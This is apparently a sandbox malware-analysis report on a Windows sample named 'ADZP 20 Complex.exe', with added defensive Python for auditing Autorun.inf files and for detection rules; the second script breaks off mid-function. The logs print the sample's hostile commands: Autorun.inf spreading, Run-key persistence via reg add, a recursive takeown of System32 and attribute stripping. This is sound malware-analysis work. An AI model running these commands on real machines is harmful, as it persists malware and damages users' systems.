Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3294165874.0000000002130000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000003.2063449358.000000000230D000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo off>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: ADZP 20 Complex.exe, 0000002F.00000002.3305122486.000000000230C000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: echo Label=???>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo off>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo [AutoRun]>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
Source: 9B6A.bat.0.dr, Binary or memory string: echo Label=???>>Autorun.inf
Source: Autorun.inf.2.dr, Binary or memory string: [AutoRun]
Source: B53B.bat.37.dr, Binary or memory string: echo off>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: B53B.bat.37.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo off>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: B134.bat.30.drBinary or memory string: echo Label=???>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo off>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo [AutoRun]>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Open=ADZP 20 Complex>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Action=Start ADZP 20 Complex>>Autorun.inf
                  Source: BE05.bat.47.drBinary or memory string: echo Label=???>>Autorun.inf
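The strings above show the dropped batch files building an Autorun.inf on whatever volume they run from, the classic USB-worm spreading trick: [AutoRun] with an Open= target that names the sample and an Action= label that spoofs the AutoPlay entry. The following script is an added example, not part of the Joe Sandbox report or of the sample: it reconstructs that Autorun.inf from the echo lines (the sample text is constructed here; "echo off" writes nothing to the file, it only silences command echo), parses it case-insensitively as Windows does, flags the directives that launch or disguise something, and checks a mounted volume for the referenced payload. File names and the scan helper are this example's own choices.

```python
import os
import tempfile
from pathlib import Path

# Constructed sample: the file the dropped .bat builds with "echo ...>>Autorun.inf".
# The duplicated [AutoRun] header and the "???" label are kept as the report shows them.
SAMPLE_AUTORUN_INF = """[AutoRun]
[AutoRun]
Open=ADZP 20 Complex
Action=Start ADZP 20 Complex
Label=???
"""

# Extensions Windows would try when Open= names a file without one (assumption for the check).
EXEC_EXTENSIONS = ("", ".exe", ".com", ".bat", ".cmd")


def parse_autorun(text):
    """Parse Autorun.inf into {section: {key: value}}; keys and sections are lower-cased,
    repeated section headers are merged rather than rejected."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current][key.strip().lower()] = value.strip()
    return sections


def audit_autorun(text):
    """Return human-readable findings for directives that execute or disguise a payload."""
    findings = []
    autorun = parse_autorun(text).get("autorun", {})
    for key in ("open", "shellexecute"):
        if key in autorun:
            findings.append(f"{key}= launches '{autorun[key]}' on AutoRun/AutoPlay")
    for key, value in autorun.items():
        # shell\<verb>\command= adds a context-menu verb that runs an arbitrary command line
        if key.startswith("shell\\") and key.endswith("\\command"):
            findings.append(f"{key}= adds context-menu command '{value}'")
    if "action" in autorun:
        findings.append(f"action= spoofs the AutoPlay entry text '{autorun['action']}'")
    return findings


def scan_volume(root):
    """Inspect <root>/Autorun.inf on a mounted volume.
    Returns (findings, payload_present): whether the Open= target exists next to the file."""
    root = Path(root)
    names = {p.name.lower(): p for p in root.iterdir()}
    inf = names.get("autorun.inf")
    if inf is None:
        return [], False
    text = inf.read_text(encoding="utf-8", errors="replace")
    findings = audit_autorun(text)
    target = parse_autorun(text).get("autorun", {}).get("open", "").strip('"')
    present = bool(target) and any(
        (target + ext).lower() in names for ext in EXEC_EXTENSIONS
    )
    return findings, present


def demo_scan():
    """Build a throw-away 'USB root' containing the constructed Autorun.inf and a
    placeholder payload, then scan it. Returns (findings, payload_present)."""
    with tempfile.TemporaryDirectory() as d:
        Path(d, "Autorun.inf").write_text(SAMPLE_AUTORUN_INF, encoding="utf-8")
        Path(d, "ADZP 20 Complex.exe").write_bytes(b"MZ")  # placeholder, not the sample
        return scan_volume(d)


if __name__ == "__main__":
    findings, present = demo_scan()
    for f in findings:
        print("-", f)
    print("payload present next to Autorun.inf:", present)
```

Caveat for triage: Windows 7 and later (and XP/Vista with update KB971029) ignore AutoRun directives on USB flash drives, so Open= no longer auto-executes on patched hosts; the Autorun.inf is still a reliable artifact that the worm visited the volume, and the Open= target tells you which file to collect.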
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\AppData\Local\
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\AppData\
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File opened: C:\Users\user\
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\virus.sys
Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\System32\Twain_20.dll
Source: C:\Windows\System32\cmd.exe | File created: C:\Windows\System32\Twain_20.dll\:Zone.Identifier:$DATA
Source: C:\Windows\System32\mspaint.exe | File created: C:\Windows\Debug\WIA
Source: C:\Windows\System32\mspaint.exe | File created: C:\Windows\Debug\WIA\wiatrace.log
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00411079
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00411C20
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00411033
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00410C80
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00410CA0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_0040B9C7
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_0040FA68
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_0040CF18
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_0040EFF0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00410FB0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00411079
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00411C20
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00411033
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00410C80
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00410CA0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_0040B9C7
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_0040FA68
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_0040CF18
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_0040EFF0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 30_2_00410FB0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: String function: 0040E5F0 appears 38 times
Source: ADZP 20 Complex.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
Source: classification engine | Classification label: mal58.troj.winEXE@294/17@0/0
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Code function: 0_2_00402664 LoadResource,SizeofResource,FreeResource
Source: C:\Windows\System32\cmd.exe | File created: C:\Users\user\Desktop\ErrorCritico.vbs
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3288:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6396:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2680:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7352:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5632:120:WilError_03
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | File created: C:\Users\user\AppData\Local\Temp\9B58.tmp
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe (same row listed 6 times)
Source: C:\Windows\System32\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "DiskPart")
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "DiskPart")
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: ADZP 20 Complex.exe | ReversingLabs: Detection: 63%
Source: unknown | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /release
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B132.tmp\B133.tmp\B134.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\B539.tmp\B53A.tmp\B53B.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: unknown | Process created: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe "C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe" -ServerName:App.AppXsm3pg4n7er43kdh1qp4e79f1j7am68r8.mca
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\BE03.tmp\BE04.tmp\BE05.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\ADZP 20 Complex.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd" /c "C:\Users\user\AppData\Local\Temp\9B58.tmp\9B59.tmp\9B6A.bat "C:\Users\user\Desktop\ADZP 20 Complex.exe""
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Twain_20.cmd
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K Taskdl.bat
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /release
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\attrib.exe attrib -r -a -s -h *.*
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\taskkill.exe taskkill /im DiskPart /f
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\ErrorCritico.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Advertencia.vbs"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Virus Detectado
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\msg.exe msg * Has Sido Hackeado!
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\mspaint.exe mspaint.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\Desktop\ADZP 20 Complex.exe "C:\Users\user\Desktop\ADZP 20 Complex.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\notepad.exe notepad
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\calc.exe calc
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown (7 identical rows)
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\takeown.exe takeown /f "C:\Windows\System32" /r
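The process tree above is almost entirely living-off-the-land: cmd.exe driving reg.exe to add Run-key entries that point at a batch file, a recursive takeown of System32, attrib stripping read-only/system/hidden bits from everything in the current directory, wscript.exe launching .vbs files from the user's Desktop, ipconfig /release and msg broadcasts. The script below is an added example, not part of the Joe Sandbox report or of the sample: it encodes those behaviours as rules over Sysmon-style process-creation events (ParentImage, Image, CommandLine) and runs them against constructed events modelled on the command lines in this report, with two benign events to show the rules do not fire on ordinary use. Rule names, event field names and the sample events are this example's own; the registry paths are written with the backslashes the report rendering drops.

```python
import re

# Constructed events modelled on this report's process tree (not real telemetry).
EVENTS = [
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add hkey_local_machine\software\microsoft\windows\currentversion\run /v WINDOWsAPI /t reg_sz /d c:\windows\wimn32.bat /f"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r"reg add hkey_current_user\software\microsoft\windows\currentversion\run /v CONTROLexit /t reg_sz /d c:\windows\wimn32.bat /f"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\takeown.exe",
     "CommandLine": r'takeown /f "C:\Windows\System32" /r'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\attrib.exe",
     "CommandLine": r"attrib -r -a -s -h *.*"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Informacion.vbs"'},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\ipconfig.exe",
     "CommandLine": r"ipconfig /release"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\msg.exe",
     "CommandLine": r"msg * Virus Detectado"},
    # Benign controls: an interactive notepad launch and a registry *query* of the Run key.
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"'},
]


def image_name(path):
    """Last path component, lower-cased, so rules are not tied to System32 vs SysWOW64."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_run_key_to_script(e):
    """reg add ...\CurrentVersion\Run pointing at a script instead of an installed binary."""
    cl = e["CommandLine"]
    return (image_name(e["Image"]) == "reg.exe"
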